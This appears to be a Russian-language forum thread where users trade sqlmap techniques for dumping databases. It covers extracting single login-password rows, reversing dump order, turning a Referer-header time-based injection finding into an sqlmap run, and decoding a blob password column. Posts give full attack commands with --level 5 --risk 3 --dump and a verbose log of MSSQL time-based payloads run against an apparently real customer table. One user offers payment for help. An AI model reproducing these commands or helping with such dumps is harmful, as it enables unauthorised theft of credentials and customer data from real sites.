Как правильно построить запрос к базе данных через sqlmap, если мне нужна только одна запись? Запрос типа Дампит все 100500 строк, но мне нужна одно значения логина-пароля, предположим, из 666 записи и не больше. Как её правильно построить?
--start=666 --stop=667 ну или через --where="email='[email protected]'", --where="id IN (1,3)",что то типо такого
Я вас категорически приветствую. Вопрос, есть ли возможность настроить мап для автоматического дампа с конца базы, а не с начала. Типа start=1000 stop=1. Приходится дампить построчно, например 900-1000, 800-900, 700-800 etc, что не очень удобно. Возможно где то в settings.py либо скриптах подправить,либо какая то надстройка существует или костылями проставить какие то специфические параметры выборки в where по id при сливе, чтобы считывались данные с конца таблицы, при дампе по порядку мапом.. Подскажите, если кто озадачивался таким вопросом, периодически возникает данная необходимость...
Доброго времени суток. Получил такой результат со сканера: This vulnerability affects /kontaktannonser/lista/. HTTP Header input Referer was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/GET /kontaktannonser/lista/ HTTP/1.1 Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ Как правильно составить запрос для Sqlmap?
тут надо самому сначала разбираться на что ваф срабатывает, а потом тампер писать, что в самом скульмапе, там типичные тамперы
В чем может быть проблема, все норм извлекается, есть пустые значения, есть с записями. Когда пытаюсь с командой "--where" отказывается извлекать. Пробовал другие значения Что можно сделать? ./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "Customer Group IS NOT NULL" --dump --threads=10 -v 3 [21:11:39] [INFO] retrieved: [21:11:39] [DEBUG] performed 3 queries in 1.12 seconds [21:11:39] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically [21:11:39] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>51) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END)) [21:11:39] [WARNING] time-based comparison requires larger statistical model, please wait........................... (done) [21:11:50] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>48) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END)) [21:11:50] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions [21:11:50] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>9) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END)) [21:11:51] [INFO] retrieved: [21:11:51] [DEBUG] performed 3 queries in 11.51 seconds [21:11:51] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' [21:11:51] [WARNING] unable to retrieve the number of column(s) '[Customer Group]' entries for table 'sb_customersTB' in database 'SB' [21:11:51] [INFO] fetched data logged to text files under '/root/.sqlmap/output/stickersbanners.com' [*] ending @ 21:11:51 /2019-11-02/
Так в том то и дело, что когда используешь where, перестает извлекать. Без where, все подряд без проблем извлекается
еще такой вопрос, можно ли как то извлечь данные, по критерию: длинна содержимого колонки. Допустим мне нужны все строки, где длинна определенной колонки не 7 символов?
А вы уверены что колонка у вас называется "Customer Group", а не "Customer_Group"? Если точно с пробелом, то попробуйте поставить имя колонки в одинарные кавычки: Code: ./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "'Customer Group' IS NOT NULL" --dump --threads=10 -v 3
<div class="error-page"> <h1>Oops - It seems the page you are looking for is not here</h1> <p>CDbCommand failed to execute the SQL statement: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''DLAj29'' order by t.id desc limit 9' at line 4</p> не крутится( какой темпер можно заюзать? Yii Framework/PDO
Попадались мне тоже пробелы в MSSQL( Правда было в имени БД) помогло добавление вместо пробела %20, и мапа начала крутить без проблем. По идее должно для всего работать. Code: ./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C Customer%20Group --where="'Customer%20Group' IS NOT NULL" --dump --threads=10 -v 3 так по пробуй.
уж не знаю, в чем там дело. --where="Customer%20Group=General" - не работает (в любых комбинациях, и да General значения там есть) --where="Email LIKE '%@site.com'" - прекрасно работает
Доброго времени суток есть проблемма с выводом из базы +-------------------+-------------+ | Column | Type | +-------------------+-------------+ | aPass | blob | --hex и --no-cast не подходят,меняется вывод но проблемма не решается --binary-fields тоже пассы судя по всему в открытом виде не хэш есть тут кто может помочь? за помощ отблагодарю!
пробуйте с начало руками, смотрите в чем проблема, может своими запросами получится через --sql-shell, думаю что какой-то косяк с кодировкой что бьет вывод
